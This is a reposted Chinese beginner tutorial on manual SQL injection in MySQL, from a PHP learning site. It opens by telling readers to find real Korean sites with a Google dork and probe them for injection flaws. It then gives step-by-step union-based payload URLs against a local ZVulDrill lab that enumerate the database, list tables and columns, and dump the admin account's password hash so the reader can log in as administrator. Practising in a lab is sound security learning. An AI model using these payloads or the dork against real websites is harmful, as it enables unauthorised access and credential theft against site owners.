讲师中心 微信公众号
首页
文章
后端开发 web前端 数据库 开发工具 php框架 常见问题 科技 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程 自媒体 新闻
专题
后端开发 web前端 数据库 开发工具 php框架 科技 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程 新闻
AI工具
AI 聊天问答 Agent智能体 AI 文本写作 AI 绘画作图 AI 设计工具 AI 视频创作 AI 音频制作 AI 办公学习 AI 编程开发 Prompt指令
学习
大前端 后端开发 数据库 移动端 运维开发 计算机基础
编程手册
大前端 后端开发 数据库 移动端 运维开发 计算机基础
下载
js特效 网站源码 工具下载 类库下载 网站素材 学习资源 插件扩展 手机游戏
最近更新
首页 > 数据库 > mysql教程 > 正文

手动sql注入(初级篇)_MySQL

php中文网
发布: 2016-06-01 13:06:36
原创
2012人浏览过

我也是才学 sql 注入一个星期,此篇文章是学给初学者看的

推荐书籍 《sql注入攻击与防御》http://www.ddooo.com/softdown/50160.htm

灵光
灵光

蚂蚁集团推出的全模态AI助手

灵光 1635
查看详情 灵光

1、找到存在sql注入的网站

  方法:在google中输入 site:kr inurl:php?id=    打开出现的网址,在网址后面添加 ’  (英文逗号)如果页面出现跳转 说明可能存在sql注入原理:一般网址都是类似  search.php?search=hello   相应的sql语句 可能是 select * from table_name where column_name='hello'   如果在网址后面添加 ‘   则sql语句为  select * from table_name where column_name='hello'’   如果网站没有进行sql注入过滤,会报错在GitHub有个Web漏洞演练项目,可以下载后部署在自己的电脑上(这里我就不教大家部署了,熟悉Web编程的大部分都会)        https://github.com/710leo/ZVulDrill网页内容如下

2、检测字段长度

(1) http://localhost/ZVulDrill-master/search.php?search=hello%' order by 1--%20相当于sql语句 select * from table_name where colmun_name like '%hello%' order by 1 -- '说明 MySQL有三种注释 -- 是其中一种 但是 -- 后面要跟一个空格才有效 但是网址会自动去掉最后一个空格需要手动输入%20注释后面的sql语句不执行(2)  此时页面没有出错,用同样的方式 添加 order by 10页面出错,然后 order by 5 出错,order by 4 页面正确 说明字段长  4

3、查看数据库信息

      方法:使用union语句提取数据      (1)   http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,2,2,4 --%20sql语句  select * from table_name where column_name like '%hello%' and 1=2 union select 1,2,3,4union前的sql语句中 where条件恒为假,结果集为空,整个sql语句返回的是union后面的结果集
   (2)  获取MySQL version user database 等相关信息   如上图所示,页面上显示 1,2 ,可以利用这个来显示我们需要的信息 http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,version(),user(),4 --%20  即  将 2,3 换成 version(),user()  页面如下
同理将 user() 换成 database()  得到数据库名  zvuldrilluser() ------------    wkdty@localhostversion()  --------------   5.6.17 (5.0以上的版本都带有一个 information_schema 的虚拟库里面存放的是所有库的信息.) database()   -------------  zvuldrill

4、获取数据库数据

 (1)获取表名http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,2,GROUP_CONCAT(DISTINCT table_name),4 from information_schema.columns where table_schema='zvuldrill'--%20
数据库中有3张表,对我们最有用的是admin这张表,以管理员身份进入网站可以看到各种信息(2)获取字段名http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,2,GROUP_CONCAT(DISTINCT column_name),4 from information_schema.columns where table_name='admin'--%20


(3)获取数据http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,2,GROUP_CONCAT(DISTINCT admin_id,admin_name,admin_pass),4 from admin--%20

  admin_id 1 admin_name adminadmin_pass d033e22ae348aeb5660fc2140aec35850c4da997   (md5解密之后  得到admin)根据用户登录入口,找到后台登录入口  ,以管理员身份进入网站
最佳 Windows 性能的顶级免费优化软件
最佳 Windows 性能的顶级免费优化软件

每个人都需要一台速度更快、更稳定的 PC。随着时间的推移,垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是,许多工具可以让 Windows 保持平稳运行。

下载
来源:php中文网
收藏 点赞
上一篇:MySQL设置utf8mb4编码_MySQL 下一篇:mylogmnr:MySQL binlog logmnr_MySQL
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
最新问题
mysql如何更新表数据_mysql UPDATE表数据操作方法 UPDATE语句用于修改表中数据,基本语法为UPDATE表名SET字段=新值WHERE条件;可更新单行(如UPDATEusersSETage=25WHEREid=1)、多行(如UPDATEproductsSETprice=price*1.1WHEREcategory=‘electronics’),需注意使用WHERE限定范围,建议先用SELECT测试、操作前备份、在事务中执行以确保安全,避免无条件更新影响全表数据。
2025-12-21 20:13:02
899
如何在mysql中创建索引_mysql索引创建方法说明 MySQL中创建索引核心用CREATEINDEX语句或建表时定义,单列索引语法为CREATEINDEXidx_nameONtable_name(column_name),联合索引需遵循最左前缀原则并合理排序字段,主键和UNIQUE约束会自动创建对应索引,可用SHOWINDEX、EXPLAIN查看,DROPINDEX删除。
2025-12-21 20:06:52
352
mysql存储引擎如何支持事务_mysql存储引擎事务特性 MySQL中是否支持事务取决于存储引擎,InnoDB支持事务并具备ACID特性,而MyISAM等不支持。1.InnoDB是默认引擎,支持完整事务处理,包括原子性、一致性、隔离性和持久性;2.其通过undolog实现回滚,redolog保障持久性,MVCC提升并发性能,默认隔离级别为可重复读;3.支持自动提交与手动事务控制(BEGIN/COMMIT/ROLLBACK)及XA分布式事务;4.MyISAM不支持事务,操作立即生效且不可回滚,适用于读多写少场景;5.Memory引擎数据存于内存,无事务支
2025-12-21 20:02:02
379
mysql如何优化外键约束查询_mysql外键查询优化方法 外键约束需合理优化以平衡一致性与性能。应确保外键字段有高效索引,避免冗长索引和过度级联操作,优先通过应用层控制大规模删除,优化JOIN查询的执行计划,必要时去除外键约束以提升高并发场景下的吞吐量。
2025-12-21 19:59:02
153
mysql中唯一索引是什么_mysql唯一索引使用说明 唯一索引是强制列值唯一但允许多个NULL的约束机制,支持单列/组合列、可多建、基于B+Tree加速查询,违例报ERROR1062,适用于手机号等天然唯一字段、逻辑主键及幂等写入。
2025-12-21 19:46:02
146
如何在mysql中开启事务_mysql事务开启语法 MySQL事务默认自动提交,需先SETautocommit=0关闭自动提交,再用STARTTRANSACTION显式开启;之后执行DML操作,最后用COMMIT或ROLLBACK结束事务。
2025-12-21 19:24:01
693
如何在mysql中使用exists_mysql exists用法说明 EXISTS用于判断子查询是否返回至少一行,返回TRUE或FALSE,具短路特性且对NULL安全;常用于存在性检查,效率通常优于IN,需确保关联字段有索引。
2025-12-21 19:23:02
366
如何安装mysql客户端工具_mysql客户端安装方法 最常用、最轻量的MySQL客户端安装方式是仅安装mysql-client或mysql-shell,不安装服务端;各系统对应命令为:Ubuntu/Debian用sudoaptinstallmysql-client,CentOS/RHEL/Rocky用sudodnfinstallmysql,macOS用brewinstallmysql-client并配置PATH,Windows可选官网ZIP免装版或MySQLInstaller的Clientonly模式。
2025-12-21 19:22:02
191
如何在mysql中使用子查询_mysql子查询基础讲解 子查询是在SQL语句中嵌套的SELECT查询,可用于WHERE、FROM、SELECT列表和HAVING子句;标量子查询必须返回0或1行1列,否则需改用IN或EXISTS。
2025-12-21 19:15:16
218
mysql中的视图是什么_mysql视图作用与使用说明 MySQL视图是基于SELECT语句的虚拟表,不存储数据,实时执行查询并动态获取基表结果;具备简化查询、权限控制、屏蔽底层变更三大作用,支持MERGE/TEMPTABLE/UNDEFINED算法选项。
2025-12-21 19:07:15
112
相关专题
更多>
热门推荐
开源免费商场系统广告
热门教程
更多>
相关推荐
热门推荐
最新课程
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送

Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号

  • PHP学习

  • 技术支持

  • 返回顶部